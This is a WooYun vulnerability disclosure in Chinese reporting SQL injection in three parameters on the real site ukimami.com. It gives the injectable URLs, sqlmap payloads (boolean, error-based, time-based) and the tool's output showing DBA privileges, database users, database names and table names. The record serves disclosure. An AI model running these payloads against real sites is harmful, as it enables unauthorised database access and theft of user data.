当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152683

漏洞标题:uki有喜网站存在多处SQL注入以及ajax接口存在注入(DBA权限)

相关厂商:十月妈咪

漏洞作者: 路人甲

提交时间:2015-11-08 20:53

修复时间:2015-12-23 20:54

公开时间:2015-12-23 20:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

十月妈咪旗下的一个网站,同样存在多个参数注入,以及ajax接口文件存在注入,似乎还没有什么人气!~~~

详细说明:

http://www.ukimami.com/classroom-uki.php?page=21&item=15
item存在注入
http://www.ukimami.com/product.php?m=product_list&category=10
category存在注入
www.ukimami.com/ajax_product.php?tid=364|10&time=0.7562016532756388
tid存在注入

uki-1.jpg


uki-2.jpg


uki-3.jpg


[*] starting at 21:33:33
[21:33:33] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: item
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=21&item=15 AND 4670=4670
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: page=21&item=15 AND (SELECT 4333 FROM(SELECT COUNT(*),CONCAT(0x7164
756171,(SELECT (CASE WHEN (4333=4333) THEN 1 ELSE 0 END)),0x7164667971,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: page=21&item=15 AND SLEEP(5)
---
[21:33:33] [INFO] testing MySQL
[21:33:33] [WARNING] reflective value(s) found and filtering out
[21:33:33] [INFO] confirming MySQL
[21:33:33] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL >= 5.0.0
[21:33:33] [INFO] fetching current user
[21:33:34] [INFO] retrieved: oct_crop@%
current user: 'oct_crop@%'
[21:33:34] [INFO] fetching current database
[21:33:34] [INFO] retrieved: youxi
current database: 'youxi'
[21:33:34] [INFO] testing if current user is DBA
[21:33:34] [INFO] fetching current user
current user is DBA: True
database management system users [7]:
[*] ''@'linux'
[*] ''@'localhost'
[*] 'oct_crop'@'%'
[*] 'oct_crop'@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'linux'
[*] 'root'@'localhost'
[21:37:33] [INFO] fetching database names
[21:37:33] [INFO] the SQL query used returns 7 entries
[21:37:33] [INFO] retrieved: information_schema
[21:37:33] [INFO] retrieved: mysql
[21:37:33] [INFO] retrieved: octmami
[21:37:34] [INFO] retrieved: performance_schema
[21:37:34] [INFO] retrieved: phpmyadmin
[21:37:34] [INFO] retrieved: test
[21:37:34] [INFO] retrieved: youxi
available databases [7]:
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] phpmyadmin
[*] test
[*] youxi
Database: youxi
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| _bak_oc_shop | 408 |
| oc_shop | 404 |
| oc_yproduct | 403 |
| oc_present_exchange | 309 |
| oc_product | 265 |
| oc_yshop | 94 |
| oc_wiki_info | 61 |
| oc_product_property | 59 |
| oc_present_gallery | 52 |
| oc_module | 51 |
| oc_jobs | 37 |
| oc_news | 34 |
| oc_milestone | 21 |
| oc_wiki_sort | 20 |
| oc_dee | 17 |
| oc_present | 17 |
| oc_bbs | 15 |
| oc_member | 15 |
| oc_video | 10 |
| oc_index_ad | 7 |
| oc_join_ab | 7 |
| oc_lost_card | 7 |
| oc_product_sort | 7 |
| oc_yproduct_sort | 5 |
| oc_admin_user | 4 |
| oc_uindex_ad | 3 |
| oc_join_table | 2 |
| oc_sessions | 2 |
| oc_contact_us | 1 |
| oc_sessions_data | 1 |
| oc_yproduct_property | 1 |
+---------------------------------+---------+


uki-4.jpg


依旧是断断续续,时而连上时而断线,就不继续了!~~~

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝